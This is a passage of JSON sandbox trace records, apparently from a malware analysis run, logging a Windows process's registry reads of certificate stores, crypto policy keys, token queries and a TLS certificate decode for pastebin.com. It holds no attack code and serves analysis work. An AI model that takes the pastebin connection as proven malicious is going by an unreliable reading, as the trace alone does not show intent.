"category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000057c" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates" } ], "repeated": 0, "id": 1850 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1851 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1852 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1853 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000056c" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates" } ], "repeated": 0, "id": 1854 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C" } ], "repeated": 0, "id": 1855 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C" } ], "repeated": 0, "id": 1856 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1857 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000570" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" } ], "repeated": 0, "id": 1858 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C" } ], "repeated": 0, "id": 1859 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C" } ], "repeated": 0, "id": 1860 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ee82", "parentcaller": "0x7ffee0b9ec18", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "ValueName", "value": "Blob" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob" } ], "repeated": 0, "id": 1861 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eee5", "parentcaller": "0x7ffee0b9ec18", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "ValueName", "value": "Blob" }, { "name": "Data", "value": "\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08 \\x00\\x00\\x00\\x01\\x00\\x00\\x00y\\x03\\x00\\x000\\x82\\x03u0\\x82\\x02]\\xa0\\x03\\x02\\x01\\x02\\x02\\x0b\\x04\\x00\\x00\\x00\\x00\\x01\\x15KZ\\xc3\\x940\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000W1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob" } ], "repeated": 0, "id": 1862 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ec4f", "parentcaller": "0x7ffee0b9eb0a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1863 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1864 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bb1210", "parentcaller": "0x7ffee0bad8a2", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x82\\x03u0\\x82\\x02]\\xa0\\x03\\x02\\x01\\x02\\x02\\x0b\\x04\\x00\\x00\\x00\\x00\\x01\\x15KZ\\xc3\\x940\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x1e\\x17\r980901120000Z\\x17\r280128120000Z0W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x82\\x01\"0" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1865 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe549", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" } ], "repeated": 0, "id": 1866 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe5c6", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "EncodingType 0" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0" } ], "repeated": 0, "id": 1867 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe5f4", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "EncodingType 0" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0" } ], "repeated": 0, "id": 1868 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbec4c", "parentcaller": "0x7ffee0bbe6a7", "category": "registry", "api": "RegOpenKeyExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "CertDllVerifyCertificateChainPolicy" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllVerifyCertificateChainPolicy" } ], "repeated": 0, "id": 1869 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe6c9", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1870 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe5c6", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "EncodingType 1" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1" } ], "repeated": 0, "id": 1871 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe5f4", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "EncodingType 1" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1" } ], "repeated": 0, "id": 1872 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbec4c", "parentcaller": "0x7ffee0bbe6a7", "category": "registry", "api": "RegOpenKeyExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "CertDllVerifyCertificateChainPolicy" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllVerifyCertificateChainPolicy" } ], "repeated": 0, "id": 1873 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe6c9", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1874 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe5c6", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\" } ], "repeated": 0, "id": 1875 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe6e2", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1876 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bc52c4", "parentcaller": "0x7ffee0bc4daf", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x1e\\x82\\x0cpastebin.com\\x82\\x0e*.pastebin.com" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1877 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bca292", "parentcaller": "0x7ffee34b38c0", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config" } ], "repeated": 0, "id": 1878 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bca30d", "parentcaller": "0x7ffee34b38c0", "category": "registry", "api": "RegNotifyChangeKeyValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\" }, { "name": "NotifyFilter", "value": "0x10000004" }, { "name": "WatchSubtree", "value": "0" }, { "name": "Asynchronous", "value": "1" } ], "repeated": 0, "id": 1879 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bc822d", "parentcaller": "0x7ffee0bca256", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot" } ], "repeated": 0, "id": 1880 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bc1c01", "parentcaller": "0x7ffee0bc4d45", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" } ], "repeated": 0, "id": 1881 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bc594e", "parentcaller": "0x7ffee0bca263", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot" } ], "repeated": 0, "id": 1882 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bca292", "parentcaller": "0x7ffee34b38c0", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" }, { "name": "Handle", "value": "0x00000584" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" } ], "repeated": 0, "id": 1883 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bca30d", "parentcaller": "0x7ffee34b38c0", "category": "registry", "api": "RegNotifyChangeKeyValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\" }, { "name": "NotifyFilter", "value": "0x10000004" }, { "name": "WatchSubtree", "value": "0" }, { "name": "Asynchronous", "value": "1" } ], "repeated": 0, "id": 1884 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9f774", "parentcaller": "0x7ffee0bca17b", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "PinRulesLogDir" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRulesLogDir" } ], "repeated": 0, "id": 1885 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ee82", "parentcaller": "0x7ffee0bca1c5", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "PinRules" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRules" } ], "repeated": 0, "id": 1886 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba176e", "parentcaller": "0x7ffee0ba16fe", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" }, { "name": "Handle", "value": "0x00000590" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" } ], "repeated": 0, "id": 1887 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba15e1", "parentcaller": "0x7ffee0ba1531", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000590" }, { "name": "ValueName", "value": "PinRulesLastSyncTime" }, { "name": "Data", "value": "\\xaf\\xa4!\\x93\\xa7Y\\xdc\\x01" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesLastSyncTime" } ], "repeated": 0, "id": 1888 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba1608", "parentcaller": "0x7ffee0ba1531", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1889 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee0ba16b2", "parentcaller": "0x7ffee0ba1645", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000590" } ], "repeated": 0, "id": 1890 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee34e74ae", "parentcaller": "0x7ffee110dddb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000594" } ], "repeated": 0, "id": 1891 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee34e74b7", "parentcaller": "0x7ffee110dddb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000590" } ], "repeated": 0, "id": 1892 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee10c54eb", "parentcaller": "0x7ffee0baa122", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1893 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee0baa149", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000590" } ], "repeated": 0, "id": 1894 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee110026b", "parentcaller": "0x7ffee0bcc456", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000590" } ], "repeated": 0, "id": 1895 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee10c54eb", "parentcaller": "0x7ffee0bcc86b", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xa8\\xe7\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x00\\xa5\\x9cY\\xb0U\\x13\\x00\\x00h\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xe9\\xd5\\x06\\x00\\x00\\x00\\x00`z\\xcd\\xe0\\xfe\\x7f\\x00\\x00\\xc0,\\xd7\\x05\\x00\\x00\\x00\\x00\\x10\\xe9\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ozi\\xb7\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\xe9\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00h\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xbf'\\x8c\\xb7\\xfe\\x7f\\x00\\x008%\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xc0\\xea\\x8b\\xb7\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x10\\xe9\\xd5\\x06\\x00\\x00\\x00\\x00\\x90\\x05\\x00\\x00\\x00\\x00\\x00\\x00k\\x02\\x10\\xe1\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1896 }, { "timestamp": "2025-11-20 10:58:35,406", "thread_id": "1596", "caller": "0x7ffee10c6785", "parentcaller": "0x7ffee0bcc496", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000590" } ], "repeated": 0, "id": 1897 }, { "timestamp": "2025-11-20 10:58:35,406", 